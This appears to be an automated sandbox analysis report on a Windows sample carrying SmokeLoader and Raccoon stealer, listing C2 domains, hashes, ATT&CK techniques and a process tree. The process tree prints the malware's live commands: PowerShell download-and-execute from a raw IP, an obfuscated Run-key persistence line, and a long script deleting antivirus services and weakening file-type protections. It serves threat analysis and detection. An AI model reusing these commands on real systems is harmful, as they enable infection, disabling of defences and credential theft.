Analysis

  • max time kernel
    152s
  • max time network
    171s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    13-08-2021 14:47

General

  • Target

    17c0023d45e798a2aca1661f490bf3b1.exe

  • Size

    179KB

  • MD5

    17c0023d45e798a2aca1661f490bf3b1

  • SHA1

    d4abe4adadcb1dd91985766f30dd40d19bf8b78b

  • SHA256

    6fa32e2ad0bfe2929dcc21d5c49a5db8ce834aa690cb8c5fcba33854b0bb0024

  • SHA512

    14d4643d1cb508c6491753f297743edb23ab5069167567415578a16ff8438ce99085c01eaed61cece3700e8fccb03e5e58837af0abbe59bf67ff8d0cb4ad13bd

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\17c0023d45e798a2aca1661f490bf3b1.exe
    "C:\Users\Admin\AppData\Local\Temp\17c0023d45e798a2aca1661f490bf3b1.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1308
    • C:\Users\Admin\AppData\Local\Temp\17c0023d45e798a2aca1661f490bf3b1.exe
      "C:\Users\Admin\AppData\Local\Temp\17c0023d45e798a2aca1661f490bf3b1.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2000
  • C:\Users\Admin\AppData\Local\Temp\314D.exe
    C:\Users\Admin\AppData\Local\Temp\314D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:640
  • C:\Users\Admin\AppData\Local\Temp\3525.exe
    C:\Users\Admin\AppData\Local\Temp\3525.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1512
    • C:\ProgramData\Runtimebroker.exe
      "C:\ProgramData\Runtimebroker.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
        3⤵
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        PID:1120
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" Get-MpPreference -verbose
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
          4⤵
            PID:2004
    • C:\Users\Admin\AppData\Local\Temp\36CB.exe
      C:\Users\Admin\AppData\Local\Temp\36CB.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      PID:804
      • C:\Users\Admin\AppData\Local\Temp\36CB.exe
        C:\Users\Admin\AppData\Local\Temp\36CB.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1404
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\36CB.exe"
          3⤵
            PID:1592
            • C:\Windows\SysWOW64\timeout.exe
              timeout /T 10 /NOBREAK
              4⤵
              • Delays execution with timeout.exe
              PID:764
      • C:\Users\Admin\AppData\Local\Temp\3AA3.exe
        C:\Users\Admin\AppData\Local\Temp\3AA3.exe
        1⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        PID:664
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:916
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:944
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:1616
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:660
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:1752
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:1084
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:992
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:552
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:1712

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Defense Evasion

                        Modify Registry

                        3
                        T1112

                        Disabling Security Tools

                        1
                        T1089

                        Install Root Certificate

                        1
                        T1130

                        Credential Access

                        Credentials in Files

                        2
                        T1081

                        Discovery

                        Query Registry

                        2
                        T1012

                        System Information Discovery

                        2
                        T1082

                        Peripheral Device Discovery

                        1
                        T1120

                        Collection

                        Data from Local System

                        2
                        T1005

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\Runtimebroker.exe
                          MD5

                          dcebca91a83098af784295a94a03d19d

                          SHA1

                          db334fe85e50fdcf0ccf8901ca7a92f57dffb90a

                          SHA256

                          ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9

                          SHA512

                          38be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30

                        • C:\ProgramData\Runtimebroker.exe
                          MD5

                          dcebca91a83098af784295a94a03d19d

                          SHA1

                          db334fe85e50fdcf0ccf8901ca7a92f57dffb90a

                          SHA256

                          ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9

                          SHA512

                          38be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
                          MD5

                          02ff38ac870de39782aeee04d7b48231

                          SHA1

                          0390d39fa216c9b0ecdb38238304e518fb2b5095

                          SHA256

                          fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                          SHA512

                          24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
                          MD5

                          75a8da7754349b38d64c87c938545b1b

                          SHA1

                          5c28c257d51f1c1587e29164cc03ea880c21b417

                          SHA256

                          bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                          SHA512

                          798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
                          MD5

                          be4d72095faf84233ac17b94744f7084

                          SHA1

                          cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                          SHA256

                          b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                          SHA512

                          43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
                          MD5

                          df44874327d79bd75e4264cb8dc01811

                          SHA1

                          1396b06debed65ea93c24998d244edebd3c0209d

                          SHA256

                          55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                          SHA512

                          95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
                          MD5

                          597009ea0430a463753e0f5b1d1a249e

                          SHA1

                          4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

                          SHA256

                          3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

                          SHA512

                          5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
                          MD5

                          5e3c7184a75d42dda1a83606a45001d8

                          SHA1

                          94ca15637721d88f30eb4b6220b805c5be0360ed

                          SHA256

                          8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                          SHA512

                          fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

